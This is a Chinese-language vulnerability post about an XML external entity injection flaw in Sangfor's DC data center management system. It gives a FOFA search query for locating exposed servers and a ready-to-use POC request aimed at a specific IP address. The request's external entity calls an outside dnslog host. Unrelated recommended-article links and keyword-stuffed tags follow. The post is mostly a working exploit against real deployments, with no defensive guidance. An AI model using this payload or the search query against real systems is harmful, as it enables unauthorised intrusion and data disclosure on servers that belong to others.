深信服DC数据中心管理系统 sangforindex XML实体注入漏洞

漏洞描述

深信服 DC数据中心管理系统 sangforindex 接口存在XML实体注入漏洞，攻击者可以发送特定的请求包造成XML实体注入

漏洞复现

fofa语法："SANGFOR 数据中心"
登录页面如下:

POC：

POST /src/sangforindex HTTP/1.1
Host: 183.236.191.18:85
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
    <!ENTITY rootas SYSTEM "http://3gjwf0.dnslog.cn">
]>
<xxx>
&rootas;
</xxx>

本栏目推荐文章
• Flutter Getx 路由管理
• node版本管理工具推荐
• 深入探索JVM：理解Java程序在虚拟机中的存储和管理
• Jmeter 如何连接mysql数据库？
• SQL Server 检测是不是数字型数据的两种方法
• 如何通过Navicat把MySQL远程数据库导入到本地数据库
• VMware虚拟机安装银河麒麟桌面版V10系统
• 和利时MACS6通过dat文件实现任意时间范围与测点的历史数据提取与科研分析
• OpenHarmony 上跑CV 应用 - Windows上搭建 Linux 桌面系统
• 深入理解spring框架：剖析多线程模式下数据库连接

数据中心 sangforindex 实体 漏洞 管理系统数据中心sangforindex实体 漏洞 漏洞 数据中心 管理系统 数据 实体 漏洞smartweb2 smartweb sangforindex 实体 管理系统 学生 系统 实体dynamics数据server 水果店 实体 管理系统 水果 实体 结构 数据库 数据 数据 数据库 实体 属性 实体 表格 数据库 数据